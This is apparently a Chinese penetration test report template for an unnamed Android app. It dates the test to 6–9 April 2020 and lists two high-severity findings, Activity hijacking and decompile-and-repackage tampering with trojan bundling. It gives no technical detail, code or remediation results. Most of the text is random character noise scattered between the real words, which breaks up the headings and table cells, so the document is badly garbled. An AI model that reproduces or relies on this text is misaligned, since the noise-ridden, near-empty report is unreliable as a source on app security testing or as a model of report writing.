+ k& n* y7 f* {' d2 o
5 E9 K- [0 X) o7 o' |! d
( G1 H5 j4 N( G) I
% C# w7 c; a- }. n
$ V# k7 M; C8 l
- {- M3 x. ^+ q$ H7 \+ r) K
; j8 A7 Y; A5 M, a* |. G8 K- M
" X7 S% I8 ]6 A; F
1 Q5 k. ~/ n& i0 \7 d0 y
4 p) P7 }( o- P- a3 {; A+ T' \! ~
) g* E( s s1 s* B7 ^1 \4 b8 b# d5 a) r5 \5 h
文档编号:
' Q8 n. t2 U' a- h9 e
& i9 ~) N) E: }1 K! |
6 ~) v6 a( r; }
% H2 U+ h2 u' h* L/ J" J
+ e1 n0 @* ^* b3 ]: B+ l" p
" `* c) o. D6 J) Y1 ], g, d
1 R* }6 q$ c. o8 v. f/ h& W1 D
- U1 _) P2 C, \4 _6 j' q" i
# v" {; e5 S* O4 G
0 ]- _5 z' c- T1 f$ {
$ Z& |. P0 p' @1 D3 T# p: n
4 \: K- r; D, L, \8 ~. M ' T. O; w, M( I- L3 l
4 b$ ]. ~- d8 V( ~& T5 Q
; `! |7 ~6 h/ U: L) ~2 [- w4 v R0 c7 A, h9 f
) s! l/ A+ r& X- s7 l/ C
- c; e6 P& V- S% \+ } + C/ o2 u, K M) p# {
Q) _! \! A# H) e. Y
7 ]7 V8 T7 `7 s/ a
0 g7 ^9 h# S+ ^* y! @+ }
% D2 F6 \! z- }7 T
+ J1 O" {9 B+ ]2 O$ V" ?- U
9 |3 w6 h9 A. L& x$ O e) d0 c- V1 q
- B2 w$ Y! F: T% N6 E' f2 a# ]% f- M3 Z* `: p
9 b& ^6 ~" J. ]' D. n% T6 z1 \
3 `3 e# f3 J2 J2 D+ N! Z9 K : m; @: X( Q! S5 |) l4 Q, ^" ^$ P
' |# A+ e" |' w" k- r C
2 o/ Y& J7 C6 Y3 n( [
6 y- G& S0 X8 [# { V8 s
9 q9 A; e" a3 _3 u7 y3 M0 ?! u: N0 g" t! G3 p8 u
某某某APP渗透测试 % a0 ]/ D R2 o
3 C+ U+ }, s7 ?3 }0 x& k* l
0 s4 t! L! r1 d/ o7 D1 k0 k! _
( E! {, H" @0 J7 E
) D( N) v% B# u. Z7 L. m/ m4 E
8 g { e+ m* ?5 ?
2 O" n# t# W# i0 [* \
+ n7 B( g- q/ T
1 R; n" p+ v1 c* ?
2 z, @* ?6 }: X2 H$ y/ w3 L
! ] {! Y0 ^; S) g- I& }) g4 E+ B% F& }
+ f# S. I! ^; F$ E# S. \: }5 d" h7 k- o& X( w
% ?" D& r+ H h ?8 f \/ ?
& ` x" W' i5 a$ P% m1 q
& _3 w0 M8 A4 d8 v' B/ {
1 x- _' \& s: q* ~/ L f
4 h7 g2 s A# P! v' i& E" C2 f
( }# ~2 ]( B, |5 @" b
3 t6 g+ m: f8 W- p/ t8 L8 _
9 ^# R7 D- Y+ X) {
0 E/ L0 X. ~" ]$ C
! T" o& e: I0 t6 ^' r L0 e# S 4 _6 c2 F/ `: ?8 Z2 y
6 v& z$ h' y/ S6 G( \
& n. F3 _# ^, l* Y) B( k7 Z d: L. ^% H) T3 I" p- w+ G/ [
z7 t0 S' P* C9 b3 G
9 y7 u9 {+ s2 Y 技 术 报 告 & b4 [: |6 c0 G3 B& H
# X7 E# c- R3 _9 [
- N. X; n% i1 h1 E( o- L9 x4 A S2 S4 T
: e# F) i. \7 k
( {. L" o1 @9 v* Z) q& i2 B7 s
1 ^1 D4 p' m+ R: `3 P+ b& U% }& E7 X
/ }4 D3 i# S" J4 M4 L: t4 R/ C# r3 v7 [ ^. X
8 j( O2 V% h* c5 Z
- @9 b, F" m% }/ \( x% |1 b9 L
3 T2 b0 z! m8 W2 Q
9 p* @1 X) L) X$ |
' k; a- K: x! O7 x3 `
2 H% j6 z) D+ ?/ S
7 I1 p2 v0 y' I. r% z+ z; i! U9 n/ I0 M% }+ K6 x, ]
; H/ O# |4 k# x& M; N
" ~1 A1 ^9 v* v# S- G
% f, ?% V3 g Q$ j' g0 ?1 I7 ~) p* m6 m
- Y/ W- E9 A. l9 Z6 r: M
. j; k0 F" D9 L8 R8 l% S
9 x9 H# L$ x1 u1 J0 `0 a" |
% y( V: F% ^0 D
2 b, E( G( E1 r9 C# u- G3 k7 l
2 m- E$ c/ ]3 U$ C
4 W$ R+ Z* x) B, S( p9 R7 w/ P1 @/ Y8 I! [( d% E
( g! s+ B9 t( a- r
! @9 l4 }# T- I# v4 K4 |
+ \" _) [! f2 Z, r+ q. p
; K# i, ^3 k7 r3 g1 h7 w . X. T3 F! T6 D+ p2 i" N4 u1 Y/ Q- S
. ?* Q9 u9 J n) A- H
2 f/ j. M2 j9 s9 Y; O* P* x. z# I b b2 i2 {9 A
8 n& I1 I( T2 k6 x$ |) _
; _, J! t: a6 v. t% X: C
: q Q9 C/ S/ Z& B
9 }7 z6 t% v7 r2 \
% [ S& D& n! |& ?
7 v4 V: U! w( W5 U* m
" D- @, R: R& j" n7 I$ t9 F
3 P- A, O. U0 g: A1 k0 E, u0 l
4 {: z; d: ?1 K& r' w* {5 o' Y7 I( e* _- l$ l2 R% v
" j. [* W: g0 w+ a
. A( q, a: G {; M; \' K! x( i
8 @/ e) x! u& r9 Q& Z8 W$ R1 |
: W& l1 s) e9 A. q4 q( g5 a* ]
2 A8 W# L7 i2 `8 w& n/ A7 \' A; g& _/ d% f
/ D _2 ]; D: P% ^; x
% X# U& M* y2 s l B2 b" P6 o
$ ?7 z2 v5 Z; x# \7 \1 l4 D
+ {' y9 f E6 u1 v# q - B, Y6 D% c+ |, M
. r# n# L0 ^6 R$ r6 X* Y. Q
Q4 Z9 K% t! Z w, Q- N7 N
{, t: {/ l' y% J& a7 n
9 a+ Z7 ^, J! z
5 I: r, Y# |7 I4 Q; a
$ D! z) y. z. J/ M
6 c# @4 t' |2 D# H4 H3 b9 Z$ k. L
6 O( Z" I( M) S) a/ K( q$ J C w
: \; x& R7 O/ m" R- V! Z
3 O4 v& ~2 |$ S% g
" @# ~7 G0 [' K% O( n1 u/ ]2 c1 F% q# _4 H
# z F% \+ R; h) L; j" R' z, d5 p/ T, q: C1 k: g" E
' ]9 r6 I' s& V, U! Y
2 r; {: ]1 y$ K$ y) G8 r
5 U6 g! h4 v% e: ?+ N& i5 Z' C. s/ W, f. K$ e( }- y
! b1 F+ [$ O+ Q
# j# T7 q- s+ P% _ @9 O4 h
2 `/ j. l# ~" t1 b/ V% G6 | O4 @0 Z
8 f1 f u* F3 B ^) S% ^ O# F
8 y8 l' W$ T2 Q8 U I
6 L" _, T u4 C4 O9 E . d2 E9 f, o1 i) X6 \+ Y
; U) q6 _) m1 Z9 P& R/ m
! D# `& L0 W5 c4 B& d
) r7 P6 _- K0 \; |# V' K7 a
' z3 y9 R$ J; N9 E2 x; v a" N4 n) Y
* j3 x9 @& l: R! Z6 M! s ( c ~" @ {! R( v" L
0 l8 {4 S, @& K+ y# ^: k Q
- W7 c" o+ b. X- h" d: Z& h5 H8 g- k3 P
& \, X) v, s: M0 _: h) c2 |
% S9 b' M2 b# A; t' T+ r) I1 e
3 v- p& H9 z( d! O" c/ A8 T# G' a ; {/ `4 s7 b o/ C& y2 X
, _+ H% I) ~& Y& \# D" ?
9 r% I2 @- c; w6 T O- f+ ^8 a6 u! \* G! _
; h; Z$ ^, J: z, m+ ?4 @; L
3 S5 @$ Z) ]3 b
' m1 s. f) P1 @* v4 z) q1 J ]
* I& g# M# ^; z: k
! d4 m5 H& ^; }4 }& U1 D
$ a) R( j8 g1 B; C/ G( @
; O& G; j# \: U; J! O0 D5 h+ y
7 D2 i% a1 o" S9 q1 P$ j/ d * D& Y) d5 P1 m# L9 \: F
4 \( L5 U' `* e3 d" }
5 v2 t, }1 j# [+ e3 k
) I0 V# X3 G9 a1 Q
$ x# o# b8 D2 j4 ~
& D# C" ]' p o% K& z. j9 K 二〇二〇年
$ \ X( Q% \$ x9 r$ F" H: j6 H" @/ `2 w3 Y* Q; Z$ i
, t! |# J P! s, N* y$ x; y- L* `4 y, U M- L- |4 T
6 M/ b4 p0 J: |& i( t p- J, g# d) A. G! z! G1 i
7 Q; v' f. P/ o/ q3 D
! S9 |+ ]* `) p$ k
4 p- O& W9 c/ s' W) L9 q
' z/ X% Z2 f! S; p( ^: Z* i, K" { ) G( v6 ]7 |: O+ J5 `0 \- p, e U
. E4 C" e9 N. s% V, { E/ V
3 g# ?3 C# O2 W- V+ R- E& f
0 q7 l! `. |5 q& H, [
* P7 X5 f9 J' K6 m
& Z5 U" i8 i& { q6 H
8 g# i6 S& ?$ s" R5 j2 l" I, D
, y" D1 P5 ?# B
) m1 l0 |6 e9 E
3 t7 F# N/ `! t' i8 H' j ! L) ]2 O! h' P; K' D0 s, \, Z, t) Y
: `: V7 V6 |/ @0 w4 Z! z 目 录 6 P4 Q9 a; S3 C& k* K8 }
7 l C L0 j' H; E3 O8 M! {2 p
- `+ [5 @& G. i$ K% _) @, c
. j; }8 z. u# H
. R, R/ E; G3 l1 e: I( K4 Z8 t. A
; {9 B( z* K5 V9 T7 _* o7 k1 i$ n' |: o# ~
! N. B1 p5 L! D, e
1 P8 X* I: `; y; e
- }* j) U0 ~8 U/ B5 x# g2 C6 Z9 q0 F$ L$ }( U' l! Q+ B. |
1 N- w# c/ M9 P- u4 p1 b+ _. H
; Y& ?8 [1 ?8 f0 B2 } 1 概述... 3 % P4 o, E1 c! G6 D M
" g1 T' }. T, v
$ ]3 N* N3 @ h' m8 ]. Y, _; i& H
. {# @! m: T+ ?- o+ M9 r ) i: o$ p9 w+ ~- m; t9 t2 W/ z9 X
1 _3 w4 m0 r, o 1.2测试时间... 3 5 p0 g' ]( n* n# H% b) c
+ a+ ?( \, z1 G. b
# h4 d- H- Z4 v' w& A
& J! C5 P% w0 u/ r) @
6 {' y$ h! _. g+ }" H3 \; e% k% ?4 H+ B# Y: R* `
1.3测试对象... 3
; J' `7 [: b z3 k5 H% G# C) m% u3 N; g6 S2 m* D5 j7 \
- p6 @ F6 o, [: k% B$ ?. u9 _
% ?0 f1 M0 ]. a( c; W 7 h) b1 r, a$ O3 S
+ i+ m/ ]! G! p* x; f) @( w4 B 1.4测试结果... 3 7 {. n9 E4 j% ?% U1 P: h, h' k
# C5 H2 h$ l1 H k) [
1 k/ p6 v6 C, q0 p6 f# Y
1 q) c' E$ V) ~; _; d0 M 7 m, P2 Q: E# J D6 J
! E- e! B i& I% K* a$ ?
2 检测结果... 4
. \ ~1 _& e2 E7 R" K2 @& I% N
6 x7 Q. J7 f6 ] v
$ r7 y* \7 _% x. Y/ v' |. X
- a6 n. Z# X e3 O& O" R ! C# g( E7 s9 ~6 H j7 h
8 s8 I: \5 ]2 @& [+ L' q 2.1 某某某... 4 9 k+ [! z9 z' r: h
* t: L3 h; g) Q5 ~% f
E+ W1 `7 _7 {7 { `4 e
]& @2 v9 O- V; ~3 W! D, H- B
& F; y$ K3 u& }" U% d5 R' v* Q0 w8 K% Q
2.1.1检测目标... 4 4 p* t2 o* n) U5 L
6 ~) H/ h+ y/ y/ i* Q0 `' _
p4 f1 @/ t* ~+ h( b: c6 w
+ N2 Y7 ^( q( ^ ! ~7 v: C# ~1 g5 ~) Z7 f6 o4 {
% h: W5 _+ |1 @$ @' C3 S& @( d4 j 2.1.2检测结果... 4
) \' H! ?9 H3 i
# S9 n8 ~; C( }/ b
3 {9 U; M& K% i
% ]% J! M8 }3 g, ^- w2 k: P
9 s. F, _/ p5 }/ E! e0 f8 D% }/ B% J2 d, `3 o$ q1 Q
2.1.2.1. 4
* f2 e: }8 w% ~5 b! |
7 f0 e& l* r* [6 c$ T
6 m9 \0 T$ F; I8 p5 k2 Q0 E6 r8 `. _
) o* r$ f6 J& H5 b: x; ?: K( ~$ M8 ?
2.1.2.2. 6
/ A4 m- O/ S5 `# H# \, L2 O, ^4 ~$ |& v8 }4 Z& o2 z
) w4 P0 @' |! b* ~9 t- i3 Q- F7 D2 q3 s- n9 o6 z y
! H, _" F# C2 w4 Y
; n* L+ H6 i: o7 V3 X# _9 O( ?
$ k7 J, Q# `' H0 v
% ^4 e+ E/ m- i) f8 ]/ f7 p
% j: h- N. z. i+ ]5 G! ~9 Y
" T2 i! q! m/ V/ J& Q+ Y } l
, y$ ?, o6 S- H
0 a; w5 s* I% _# ~ 8 a8 a. ]( c8 t
. M' ?7 o- q* h1 b
+ f* `& D# e5 G( L
) z- y( z8 Q5 j3 H
2 ?+ X$ A) q/ R
1 A: G0 c, F) E' {' a
J( h+ ^- C5 U9 {; h* d, ~: w2 J9 z2 P }4 r) |$ e
1 概述
6 a9 r8 A5 j) U6 i) \$ ]6 H9 ]0 l" X; D; P4 D
' ~# @. ]+ o& E' z# x, Y/ Z
% d. A5 ^3 N/ O# x7 s
6 O3 k! y! a7 q0 V4 D8 ]3 i8 v, {; ?0 v8 J
1.2测试时间 4 J& x1 l/ Y9 _1 _5 w/ ^) W
. G+ P$ e @# O3 j
+ N u* O* W2 G
' i0 s0 [7 y3 {4 ]8 o
' l$ u7 ~/ E2 P! u5 U, S# c; m. r, l3 J7 D
& W$ E0 h& X: }% B% \- R- `# e5 q; A( C6 k) n: j& G
& T$ w$ t/ M2 B. ^
+ n2 P! y: H& B1 I: D
|
2 y4 e+ q9 @' P& s
0 j) ?8 b' y& W; m / l! i5 R7 R0 F1 o
: Z5 S4 k; J/ K/ }- q& l 渗透测试时间
: ? C( o- m ^) B
! W% `* @ v* h3 ?! w ' b* E7 h+ K& _4 M; \$ U
( u/ @9 v9 A" m+ m* g* J/ [ | # s$ b- c. X9 T
# V0 v* {1 \( R9 p+ ~ m9 H$ Z
) f6 r9 g0 o* |! r* H
$ }8 k' |* [% a; S& a& }
+ t6 T, w2 R0 O$ w# M; k g* Z5 ?4 d" A0 f% `, _7 M
|
( R1 j' f& B0 K1 Y) h& r I. k+ p: q2 A$ `) Y
5 c& L0 k7 [) y5 a# `& D( X
- c" s. s! g3 W( ^2 T. `( [ 起始时间
) V+ g# L& B& `. d# O
2 g4 Q% A% s/ S6 P' y5 H
( p& k3 W4 B1 e2 x) o$ n: {& J
2 n% R9 O( z+ ?. F | 5 y! q: `" g) J& I0 |
8 D% d4 S1 K5 I, Q" q + G8 l) N$ o! S4 r
9 [* W3 p$ {* X7 z$ e4 y6 T$ J( @
; ~9 m- e" j( F4 A. p2 E
/ [. f( A7 A: H- m 2020年4月6日 % X, I' H% _: N' `9 @' r
) X) i! P; M* }+ n8 E& g. z 5 A5 p# g+ f% o [* @1 X' W2 o
2 y2 }' \: @3 P, u# Q | # b( ^" o Y3 V& _! u( T& E" q
5 J4 J) g2 l0 v9 K
, ^& Z0 `% V7 U2 _6 y" o* g
* m/ \ A) W- ]; i7 s3 C7 z) M2 z
+ F, j: r2 ?# }7 \3 O! q, o% N( M; l5 M: A1 `
| & x& @) }/ Q0 \: Z3 p" n2 \1 h
5 J, ~- |- {+ Z) ]" T9 R0 q) ]
; [7 y" ~: G: H$ p$ a9 J) E9 k, o4 {! @) _8 x- N- d; O1 B
结束时间
9 s& a: i; x% ~% e& w& N* M; T0 r
9 `1 M" C2 z9 p( e! l
7 a- t# N5 M3 `
9 n$ Y' R9 c" K+ `+ E: e0 K3 i% k | * z/ t3 h$ O' e; B. U
( w& Z5 W) P( J" H$ Y
& `! }0 C" j' h$ \
& S6 Q& b7 _/ [/ E d; \; j
$ x: \$ K& W3 }' T- D
: q- _: K; e" I r 2020年4月9日
/ H! f q: s' D8 _6 Z5 W, ]
7 p: [" r3 U _' ~: p
1 }$ k/ V# i' x! F% |; F, n9 V
|
1 z4 Z3 C* {: ~* m" v1 P; f. S& ]1 ?. P6 s5 w
7 f& Z* o# s0 \7 ]
& U! I7 @! p0 z- _6 k
' ^$ y% H2 Q3 h2 r
: M1 g& k& T. a/ W
9 k: a; n# J7 }
6 o4 z; B9 E$ V }' o/ V! q - O5 J: E8 j3 \$ L; _
5 V) j$ q- J! c$ q. t
1.3测试对象
4 i- W. ?8 u& N% q
' h: p; B0 ~9 F8 B# C7 h
. P7 e) t0 K, }/ ?: f7 r9 B l$ V3 S9 `) m2 `2 w$ R( u
- w. N( A( M$ a4 R- Y$ f3 r& p+ _
! t( r5 U3 `1 T" C7 M) p7 A. F
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
/ `; G* R3 S; [7 _0 b! i9 I* @1 y4 n' [8 x& E8 Z" u3 v( N. z
! O+ i' c# U6 u7 o5 f! k
& v! i4 @ }7 p7 B0 u) M
* {6 X1 H+ W/ F N& ?' G l' f3 ^" E6 U6 B# B
表1-1 检测对象 ' R# T3 R8 { h' A& Z4 J4 x/ b
/ T5 w( H# F1 G2 N" z% U8 f
) x! | u! \, S% B, f, E
6 Y3 c: J& g) F1 ?6 _( S 0 u. y: I4 g8 S3 L1 k& {
8 E: _! l2 o- G 2 O$ k. t9 \1 {- S+ B8 W
0 C: n; L6 ~& z8 E( R# R. h4 u ) j$ f6 J) F' `/ R, Q
8 b% D( }- R( r5 E7 ?9 { | ' s% Y& {6 T6 E2 K n& c) j
2 w* F1 b5 B) m" k* n5 Y+ c" t2 |, \ : ]# D2 z# Z: e4 P1 k# x ?- r% k
, ? z- s0 r3 [6 c6 T0 x5 Z% U 序号 / _0 P7 `8 g, m9 i7 o6 {
9 L! w* W8 y+ L- S# i. V3 g7 k. r: w
! d, E0 i+ l" ?
7 H0 D4 e, ]1 }0 Q/ h |
! B: E8 v! t) t0 h! b( e% d8 F1 y) S! U( P- U
& r) \- e4 w9 n7 h
% V4 l" J% `1 V M4 c& u ]( P! G+ C ' e: w6 c% i c/ w) S
1 @6 q; o3 b2 ]! y: t: X# @ 测试对象
( ^# {5 F' H' o' h4 @
1 R5 R4 Q& z% E8 p+ J* M # d, P9 N+ C6 r4 P
4 S. d2 ]3 @/ C3 |
| # B& U. z+ g4 H( ~6 P, O
; A/ u! C& e, d2 Z+ ?2 h# E# B+ O; j& Y
5 [3 @! k9 w) ^* y; m5 ~$ R9 _# h( }* @8 B$ t4 t! ?3 U
* r- ^) ]) U0 `/ u; o) f$ O. Q. P
! K9 q) T0 y9 L) F# W$ A) ~/ u* F 测试地址
8 E# A$ H3 W* q) w) v2 B" O3 H- V" N3 `: X! i
+ J# i3 F Y) D; C2 j# Y
- x2 l4 F! H& } I3 c" y& o/ I. X | % v/ k7 K$ q# q3 e" y
6 p5 G( [( v& J. Z4 I$ E) ~2 L
/ {: \8 I; r: {2 u0 e0 |9 n( G! i( Y& A |- p
5 _3 I: F! l& _2 j+ c/ L8 p
. u, Z. z/ B9 b$ J 安全漏洞 8 j( p- ]1 y+ T9 H5 O& l9 q& D$ G; H
- E, h& ^- q6 }1 N ( a9 Z4 g( v6 L1 P
/ h7 |9 y1 {% N' v/ j! O7 p
|
' u3 C q4 Z! l V5 u9 |1 d: c- Q- Y9 y% j l
2 `- e! m3 S+ g
9 H+ I: U* @" H
- i! D2 f; J0 ?! o- d5 Z9 y6 s
. Z' J) E- Z S3 W |
* m* A, |& b8 I
7 L! w$ ?5 Y. t4 I3 d 1 L" N6 o* M0 d; G5 V* v: K
4 B8 i$ N8 ~) w9 q% R2 _
1 ' Z' q7 T6 m/ |+ N
7 t5 b: X R5 X
* ~" H. e6 d5 u# a4 o' z P4 X; d5 S' X o8 W8 w8 S/ j& l9 o
| 4 e e) g! J" v$ z, g+ y# H( O
7 A" v- }: g1 \; U: I, R! z$ u7 b $ v' n6 F1 `2 X ^; d8 G7 C5 q D: Z+ u
& U$ I @( G& x2 U0 T. e/ T& p! R
. o# F6 T4 H3 s* u1 O* [( C6 g" }$ {+ c
某某某安卓APP
7 C- V* N, ?5 Y5 Z6 x; z" d$ `. X8 k
( L8 w( m9 s. U0 {
( b2 |9 E( s& N6 O9 m' {5 o. T
|
* j$ X0 Q6 j; {5 y: A" V: }7 k4 C* X# v, c) ^1 e
8 i# A0 ^/ h' W( [: j' J. q, x
3 W- M* Q% z7 `$ V+ Z ( R; m" j _& X9 s+ E$ B
: O7 a* h: u* ]* a) l
9 D' U% y; k3 q, I. {( s" G
M! T# [( S* Q
2 T8 e' Z* a0 y: U$ D0 l- w. m% l1 |/ O+ H/ d7 o
|
0 N( h7 D ], p/ x1 Y9 M! X2 C! q( x M% ^* k7 o" S; q
r" G( X: C/ q. q6 Z, Z6 T
$ ~8 n, A: A; L9 s
# I7 C& o8 _2 v" e" u
. n7 G$ O0 e7 ]3 d: z! o 2 4 A" b+ N# t* s% k
! l, x4 F/ _6 I% @5 h$ g
) q: q5 Z& B' E) H4 S- {8 t7 @1 D- G" G3 J# O
| + {1 C+ g* d+ c' A' C& k
( M7 a$ M: J% ~2 Y" v
/ I9 b0 P1 R* V/ W1 c. L$ l1 F+ n9 [+ E# q6 A! a. u& F6 m( o
* u O0 ^3 a! J: g# J( g
) q! r7 e- e; `0 f4 u& D
8 V v5 a7 @2 O* y! D) z! n, s" ^' E# l' }2 x, X% q- B
7 l# C; J, d; h
- n7 `/ \1 m7 y
1.4测试结果 % }( I+ K% y8 f9 y- ]/ ~1 `
6 G- d2 D& b. e8 G: |
, T6 M! C' o/ R* N" _
) R+ C" | ^- U+ `+ r3 T! g
$ h; P1 [8 V( D, r
/ J! t+ U5 u1 d; t1 ~* q. X
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
) P2 T4 ?) ?6 T2 O F G9 n" W# R
0 A Q9 H$ C! v K( K, u
7 j: d- O9 ?) @) X3 X' e
7 d6 D' l5 U+ c
* z0 ]8 T& @8 N4 j# ]" m
1 B4 G% |) } Z( @
; Y) o4 `9 d0 S4 y- h/ q0 F. e" F6 ]0 U6 b# m: u ^# k' ]
* ?% ?- n8 Z6 d+ u" N" h* j
, E9 }9 z- X0 |5 {* _- w
6 V4 H) z4 f! C% ~: H9 T* I
/ M" \) m1 \* m3 N; l0 O % u- \4 L3 j( Z3 E/ B) b8 c
\/ b. d" N/ {/ i# y7 O& Z
) u+ y# A& V$ ?& ^
' }# P8 X+ U9 w: W; r- l3 Z
7 f& M* ~* v5 U1 v6 v- a0 I3 X
& C( M! O7 t4 j- u: ]5 p: D | 0 r* J3 H& H! q
, B; n" ]* i8 b/ q9 d
" a: U3 L$ b2 z/ L4 F3 {* o9 I" S t
序号
; ~* l- d5 G$ n0 v
1 Z9 H- U8 }+ M7 j* n9 M $ a1 d( A! M/ I( v7 y: p
# y% U. \! i H+ N | , V( A5 d( p! ~7 T% O
! q" B! V6 N% d, t: f, ^
) U% v0 p" C4 i6 l6 T: h2 }
/ q3 @" I% {! g! F1 M9 n$ w. [
; F9 [: Y9 R, M* U' E8 q8 h
% Q/ X+ W. \% k- _1 j 系统名称
( z$ g8 e+ X9 l1 K7 p* r* B. c! i. J) z( z! z! T
P9 r) C' O, k6 g! X# c$ C- _& `/ D1 n5 c* b8 W7 E4 ?
|
5 _/ C4 \* ^& u8 a: h+ Z
$ Y9 t' ^. Y% J7 B- n5 m + o4 G- K- Y, j* h1 \9 z8 G7 a$ ~
' _, f9 P J M' t; V8 Q
% e. v9 z& W, [
/ r) ?8 K7 r+ Z2 h( ?" D
漏洞名称
' t3 q8 x# t- c5 E5 o% o& h$ @* |. a% k
0 W! y' @, L4 f% \- y# Z4 t
% t8 x# v; Y) ^ G: e) r | # K5 s2 I4 s4 u7 v0 W% z2 e
$ q% }8 o! s2 _
2 n/ h& l' o0 E' r1 g6 H: z- o- E2 c1 O3 e, b( w) k' X5 @ J# m
* B" }( j$ d) u# f1 D q3 ?5 t
4 V% e( I8 d( {+ d! C 漏洞危害
( ^. s8 j5 q4 S' n5 o/ g
% \8 D. N) v0 J 8 p4 t% W6 F0 B/ [
' Y8 N( o8 e* R! {
| : w: o8 W! ?3 t: Q' `
5 \+ W5 l5 h5 N3 P. p
e1 m: o! I- {) Q$ K! a" I. S. u( B) N5 A1 A. ~
$ K! p3 a6 Q" p' R; `& F7 Q: \, p+ [5 p6 G- E6 v1 |, f6 Z4 C, E
修复结果
. @ a9 z& N2 }# K2 o
/ `9 u, J6 F8 r3 S# ^! E/ B; o
; G8 n& Y E2 h# T1 B! w5 x5 V0 l* C9 i) ^ O, ~3 Q
|
- `7 T8 ^8 t9 x/ F8 l; o+ j# W' {4 p! x+ `0 c( F9 D5 H
5 t# ^1 v* S( f5 T' w5 H
, |) U/ p V$ V$ i3 W " n0 {, d1 c- `' h K* A( r6 J- @
. k% ]+ D3 S" C- P/ a3 Y |
0 W1 c' T# D, ?# V ~, [, e3 l2 }1 ]0 Z, a `$ H
; F# U, I: Q. ?1 R6 G7 D" r4 l
$ W: I, O# b9 P7 Z2 f 1 # O( X. n/ w1 H* p6 U
) a5 L! l2 V5 O9 L" v0 B% S
3 P; o# Y( b" b/ ]- E# u7 C1 B" h9 A( \% d' v3 `: F# W
|
8 k# T% X# M* P: h9 l8 b) h9 q8 Q4 B" J+ j
; W7 X$ a5 V$ L- d/ _* L1 N* j
+ @6 N! t! h7 H' y. Y. o1 L
# J5 m; [; r, |( [0 g; _; I" ~5 a. u0 Z( {* o: l( L. M, Y
某某某某某某APP % T5 G. Z3 O# Q* h5 D: C
* \: I2 |% | R# e* v/ t. L
$ `7 Q5 v- \$ l5 L& R% l' S. e/ Q8 P6 Z- t& Q1 O! F
|
$ M: M9 } K. V0 o" s2 D, g3 ~4 t
* t0 v4 q/ ~( G- j$ r+ ]. m- w; m; }3 O
- a2 ~# D) o8 b; v* \: m: j
" s. N5 \" M( k: B2 |6 y5 ^5 q; P Activity 劫持 . t4 t2 A5 P ]! ~# f
" O$ ~/ ?0 L" b$ ?4 A& M
- V0 a1 T* E' j6 A, A" r3 W; n6 O* ~1 N K
5 A5 ]" W) H0 H. v+ n
) t- B( ]; Q1 Q/ R; T" n# J1 H' c
5 W) q: @4 H1 E3 S
1 e9 E/ D$ H+ A3 T5 f' y9 R 9 L7 F, \4 n! x$ J, v
2 @% [, d1 _4 t+ i9 P0 W8 j
|
0 R6 V! T' t4 W9 ~! N0 `9 Y
- N7 J8 b9 H2 u: o* g . m, e, L- ?: C1 w v" u! d: x
) n7 v& l& ^; i+ x k
' Q7 U4 d$ C- Z0 H3 ?6 z
, o+ Z$ e! @3 a# l4 x' K 高
( L' x7 N8 n5 U* U9 B1 L6 u3 d G3 Q# c
0 ]9 j" H/ z1 r* T6 V
0 F0 e4 p# e+ i# Q+ V |
) B0 _3 H% [- `+ Y
7 c# E+ R* {: A! n/ ^ 7 ?# Z8 O; c, Z( P" H+ `
4 }1 a2 h" T1 G1 L1 {: l9 U+ r " a Z9 I/ ]: [' f7 H8 N9 _
* k1 ]5 G4 u) U, H) k 9 }5 E- L/ ?' Q; b, K
. T6 i& O1 [. i1 p2 k
: [7 r) |2 w" Z5 o' E1 j
2 m! Z/ b0 q8 L9 {5 P7 p | 7 w# j; k H. G* [$ U
2 s h& p' e# x$ |9 k
8 R9 I0 I. b. N7 {& A. N; M; ]
4 E0 g" A) Y) |3 Y5 I7 Z
* j2 b& e; J. W' Y+ P0 G$ _0 f
" f# N3 d8 b! y- P | 2 [( @* S0 S2 {7 s9 F- N" y
; \* P2 U3 g1 i9 L$ A
7 u5 |' R! U2 ?4 D" B3 K# V; F) I. w+ t+ H& C
2
, D6 H4 ] A6 z- v) g8 d/ q' ^- [! @7 z" I+ r# K3 u
4 y. b" I% ?/ l' z# K! N; B4 _$ Y- h$ Y! a6 T9 ~, v+ |3 h1 M
|
, m: q) R. Z, [8 W4 P) Z9 d/ a; B8 ~1 i l1 n) X; Q* d& `
, f9 D) H& z1 }. R% s2 m' I6 x2 x; Z9 [% a: x
) I' E h7 h7 q: {, b" A- W; n% Z
- j# N U: \( p2 u 某某某某某某APP
9 ^0 g1 i, E$ E! r7 \" V# p6 S
% b* _6 y8 _& x, j
0 z- \3 H3 g2 J: ?9 o+ u5 n, f
' C8 } k( z% {: W, k; Q/ T2 s+ S6 z |
v" O+ F$ t- b) }5 x3 h" s7 G
# x" O5 j5 r5 V
; f8 a; V& C4 X
5 z* J3 L3 L) o7 l' X) g
8 I) V6 Y8 D% H/ A6 S$ d7 I6 m
/ p1 l* X9 N% m% F' D 反编译二次打包捆绑木马、篡改APP代码 5 q- V+ N* l, Q1 b4 \
{0 }( b& y( z3 ?" @
# G& e8 C% S6 v9 h! n/ [
% x9 B9 z- d& t- ^( C | 2 R- o4 | X6 a4 u( ~! B. v
! x+ X2 S6 d. D; H; t . e* d6 x5 l( G# a
" S! X( c( ^! c; ~1 z
9 v7 O4 @1 i `0 `1 J. {
. ~/ I) B7 M/ v" b0 U- M0 M 高 $ y; o8 E6 h, ~
: @2 W; o/ I: ^& W1 z5 K! D
8 _! l: U8 U* c e# i
1 N6 w0 \; y; y: a; ?9 ~5 W, |7 H$ r | ' }* a9 }$ n4 `5 `; k( c. U/ D
7 L( @* w& q3 |
, Z% W1 m1 }$ v' }, H$ l9 x; q* {% ~- b, [2 o# ^
2 I" x) \. p- L) H* F, n: b# X
. r, @! s6 _2 ^- J : q# O: |( x* p. J$ H+ L
( f# d3 N5 u0 I. |
6 l; K d0 n: O' `8 t- W2 j6 F% k2 r* i# f. b
|
3 e; y, Y: R) r4 Z8 L7 Y/ G% z. F4 V4 }/ o n/ u9 B5 v
/ q e- M2 b9 P6 ~7 d
6 O( L+ v: o: J
- i* V1 D- W! z- ]: x! [/ h: g: y$ P2 ]2 x& A7 t
" p& ~. @ t, }# {3 l9 w
& z' E( C* A. R! s; y
: x9 H6 E: |' U5 p
x( [! H3 ~- p) x' ?9 S
& {& l2 q/ E9 T Z0 q+ K0 I' d) Q/ B
: U [3 K8 M$ ?
& b' s& C w; A! ~$ j
) u. a4 ]! b; h! O0 k
, q" @4 @/ |' a0 j* ?7 {1 R8 w/ f# ~+ W+ u7 B1 K" m! }7 @
